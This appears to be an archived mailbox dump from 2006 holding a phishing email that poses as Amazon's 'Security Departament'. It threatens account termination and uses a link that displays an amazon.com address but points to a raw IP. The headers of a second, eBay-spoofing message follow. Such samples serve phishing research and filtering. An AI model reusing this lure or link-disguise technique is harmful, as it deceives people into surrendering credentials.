From: update@amazon.com <update@amazon.com>
Content-Type: text/html
Message-Id: <20060118144558.F06549CF7AE@localhost>
Date: Wed, 18 Jan 2006 06:45:58 -0800 (PST)
Status: O
X-Status: 
X-Keywords:                  
X-UID: 244


<meta name="generator" content="Namo WebEditor v5.0(Trial)">
&nbsp; <IMG height=30 
src="http://g-images.amazon.com/images/G/04/icons/amazon-logo.gif" width=140> 
<TABLE cellSpacing=0 cellPadding=0 width=600 align=center border=0>
<TBODY>
<TR>
<TD><IMG height=2 src="http://mail.yahoo.com/config/login?/pp.files/pixel.gif" 
width=2></TD></TR></TBODY></TABLE>
<P><FONT size=2><FONT face=Verdana>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Dear&nbsp;<STRONG><STRONG><SPAN 
style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana">Amazon<SUP>® 
&nbsp;</SUP></SPAN></STRONG>&nbsp;</STRONG>member </FONT>,&nbsp;<BR></FONT><BR></P>
<P><FONT face=Verdana size=2>&nbsp;&nbsp;&nbsp;&nbsp;It has come to our attention that your&nbsp;Amazon 
account information records are &nbsp;<BR>out of date. That requires you to update your 
account information .  If you could&nbsp;<BR>please take 5-10 minutes out of your 
online&nbsp;<FONT face=Verdana size=2> experience , and update&nbsp;<BR>your account 
, 
you will not run into any future problems with Amazon&nbsp;<BR>online service. 
&nbsp;<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</FONT></FONT></P>
<P><FONT face=Verdana size=2><FONT face=Verdana size=2>&nbsp;&nbsp;&nbsp;However, failure to 
update your records will result in account termination.&nbsp;<BR>Please update your 
records in maximum 48 hours.&nbsp;</FONT>&nbsp;<BR><BR> &nbsp;&nbsp;&nbsp;Once you have updated records, 
your&nbsp;Amazon 
session will not be&nbsp;<BR>interrupted and will continue as normal. </FONT></P>
<P><FONT face=Verdana size=2>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;To update your Amazon 
account information click on the following link:&nbsp;<BR></FONT></P>
<P><FONT face=Verdana size=2>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</FONT><SPAN class=treb><SPAN 
style="FONT-SIZE: 9pt; FONT-FAMILY: Verdana"><A 
onclick="return ShowLinkWarning()" 
href="http://148.223.175.105/icons/exec/odibos/subst/home/home.html/103-7565474-4120652/index.html" target=_blank 
onfiltered="return ShowLinkWarning()">http://www.amazon.com/exec/obidos/account-access-login/ref=/index</A></SPAN></SPAN></P>
<P>&nbsp;<FONT face=Verdana size=2>Best Regards , <BR><SPAN 
style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana"><STRONG>Amazon<SUP> 
</SUP><SPAN style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana">Security 
</SPAN></STRONG><SPAN 
style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana"><STRONG>Departament</STRONG></SPAN></SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
</FONT></P>
<P><FONT face=Verdana size=2>&nbsp;</FONT> 
<P><FONT face=Verdana size=2>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <SPAN class=tiny><A 
href="http://www.amazon.com/exec/obidos/tg/browse/-/508088/103-3650287-7644618" 
target=_blank><FONT color=#006699 size=2>Conditions of Use</FONT></A><FONT 
color=#006699 size=2> | </FONT><A 
href="http://www.amazon.com/exec/obidos/tg/browse/-/468496/103-3650287-7644618" 
target=_blank><FONT color=#006699 size=2>Privacy Notice</FONT></A><FONT 
color=#006699 size=2> </FONT><FONT size=2>© 1995-2005, Amazon.com, Inc. or its 
affiliates. </FONT></SPAN></FONT></P>

From aw-verify@eBay.com  Wed Jan 18 11:28:05 2006
Return-Path: <aw-verify@eBay.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail1.example.com (mail1.example.com [10.1.2.3])
	by naughty.example.com (Postfix) with ESMTP
	id D5F7B536F88; Wed, 18 Jan 2006 11:28:04 -0500 (EST)
Received: from 66.165.234.32 (unknown [66.165.234.32])
	by mail1.example.com (Postfix) with SMTP id 069D26CCEF7;
	Wed, 18 Jan 2006 11:28:03 -0500 (EST)
Received: from 249.104.56.85 by ; Wed, 18 Jan 2006 09:23:03 -0700
Message-ID: <greenwood@hotmail.com>
